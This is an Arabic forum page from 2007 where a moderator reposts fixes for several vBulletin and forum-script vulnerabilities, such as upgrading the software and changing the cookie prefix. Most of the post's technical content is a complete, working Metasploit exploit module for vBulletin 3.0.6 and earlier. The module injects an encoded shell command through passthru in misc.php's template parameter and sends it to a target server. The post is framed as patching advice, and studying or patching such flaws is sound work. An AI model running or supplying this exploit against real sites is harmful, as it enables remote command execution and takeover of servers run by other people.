العاب

 

 

منتدى دلع نجد ينتهي بتاريخ 22-8-2008
رسائل قصيره sms

 

الفنان  احلى الليالي ينتهي الاعلان في 2_9_2008  

شات-دردشة-دردشه-دردشة

 


العودة   منتديات برق > منتديات برق التقنية > برامج كمبيوتر
التسجيل التعليمات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل جميع المنتديات مقروءة

برامج كمبيوتر برامج كمبيوتر برامج جديده برامج مجانيه برامج غريبه برامج سينما برامج سينما برامج صوتيه برامج فرومات برامج الوان برامج انتي فايروس كاسبر سكاي برنامج مكافي برنامج حمايه برامج حمايه كمبيوتر برامج عالميه برامج مونتاج برامج غريبه برامج اصحاب المواقع برامج العاب تحميل برامج برامج للتحميل برامج ماسنجر نكنيمات نك نيمات ماسنجر نكات اسماء للمسنجر برامج خطوط كمبيوتر تحميل برامج شرح برامج مجانية برامج كمبيوتر برنامج محول الصوتيات برنامج تحميل برنامج الجافا برامج الكمبيوتر برنامج ترجمة تنزيل برامج برنامج كاسبر خطوط عربية برنامج الياهو برامج حماية برنامج mp3 برنامج جافا برنامج النيرو برنامج ريل بلير برامج ترجمة برنامج winrar برنامج الريل بلير برامج تحويل برامج تعليمية برامج 2008 برامج الحماية برنامج ضغط برنامج نيرو برنامج الحارس الذكي برنامج jap برنامج المؤذن برنامج ftp برنامج الوافي الذهبي برنامج الجاب برنامج جاب برنامج تحويل الصوتيات برنامج internet download manager برنامج حماية برامج جديدة برامج التحميل برنامج تورنت برنامج ترجمه برنامج تسجيل برنامج سارق الصور برنامج التورنت برنامج ياهو برامج صوت برامج حمايه خطوط سما برنامج الاذان برنامج تحويل الفيديو برنامج فك الضغط برنامج التحميل برامج مجانيه برنامج الكاسبر برنامج للتحميل برامج الصوت برامج للكمبيوتر برامج تشغيل برنامج download برامج اسلامية برنامج كاسبر سكاي خطوط عربيه برنامج تسريع التحميل برامج ضغط شرح برامج برامج ترجمه تحميل برنامج الجافا خلفيات كمبيوتر برامج للتحميل برنامج مترجم برنامج تغيير الصوت برنامج الرسام تحميل برنامج محول الصوتيات برامج جديده

 

 

شات سعودي  منتديات اغاني :: العاب : :: برامج نوكيا: بلوتوث :: زواج :: شات منتديات

بعض ثغرات المنتديات راجيه من الله الاستفاده

رد
 
LinkBack أدوات الموضوع إبحث في الموضوع طرق مشاهدة الموضوع
قديم 11-11-2007, 03:36 PM   #1
مشرف
 
الصورة الرمزية ياعيون دلع
 






معدل تقييم المستوى: 1ياعيون دلع is on a distinguished road
افتراضي بعض ثغرات المنتديات راجيه من الله الاستفاده

سوف اضع بعض ترقيع ثغرات المنتديات راجي من الله الاستفاده
والحلول طبعا منقوله من كذا موقع ......

ثغره في ملف اخر عشره مواضيع


قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php)


الترقيع سهل

ابحث عن كلمة وامسحها

$fsel

وكذلك كلمة

$ftitle

انسخ الكلمه والصقها في البحث


ثم احفظ الملف وارفعه مره اخرى ...

-------------------------------------------------------


ثغره تمكنك من رفع شل على الموقع

وللترقيع

الترقيه الي اخر اصدار او الي قبله



كود:




##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the ****sploit Framework, please see
# http://****sploit.com/projects/Framework for more information.
##

package Msf::Exploit:hp_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php ******', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'De***********on' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

'Refs' =>
[
['MIL', '832'],
],

'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},

'Keys' => ['vBulletin'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";

my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine(" Sending the malicious vBulletin Get request...");

$s->Send($req);

my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

1;





وللتوضيح اكثر
الثغره في ملف

misc.php


للاهميه اخذ نسخه من الملف قبل الترقيع


------------------------------------------------------




[ثغره] بملف config.php تختص بالكوكيز

يستطيع الهكر الدخول من خلالها على بمستخدم الادمن بعد تعديل الكوكيز ..

طريقه سد الثغره كالتالي :

افتح ملف الكونفيق الي في منتداك


// Prefix that all vBulletin ******* will have
// For example
$******prefix = 'bb';

غير الحرف bb

الى اي حروف تبيها المهم غير bb

-------------------------------------------------------

منقول




[img][/img]

منتديات مزايين1-2-2008

من مواضيع ياعيون دلع في المنتدى

ياعيون دلع غير متواجد حالياً   رد مع اقتباس
رد


أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
وصف لشكل وصفات النبي الحبيب محمد عليه الصلاه والسلام يا عيون احمد منتديات اسلاميه 6 06-01-2008 10:43 PM
وصف النبي r وصفاته أسير الروح منتديات اسلاميه 0 02-08-2008 02:44 PM
مفصل دلائل النبوة $$$المجنوون$$$ منتديات اسلاميه 4 12-06-2007 03:00 PM
جـمـيـع الـفـتـاوي الـمـهـمـة لـلـصـائـمـيـن والـصـائـمـات $$$ الحب الخالد $$$ الخيمه الرمضانيه 3 11-01-2007 03:03 PM

مسلسلات تركية

 

شات كتابي-شات صوتي-دردشة كتابية-طرب توب-شات كويتي

مجلة هيا-العاب ماريو-منتديات-حضرموت صور افلام بنات يوتيوب العاب


Powered by vBulletin® Version 3.6.9
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.1.0

تـعـريب » شـبـكـة عـرب فـور هـوسـت

المقالات أو المشاركات أو الآراء المنشورة في شبكة منتديات برق بأسماء أصحابها أو بأسماء مستعارة لا تمثل بالضرورة الرأي الرسمي لشبكة برق بل تمثل وجهة نظر كاتبها.
  تصميم المبدعون
> منتديات برق منتديات عربية سعودية خليجية سنية يمنع نشر اي كراك او انتهاك لاي حقوق ادبية او فكريه ان كل ما يشنر في منتديات برق هو ملك لاصحابه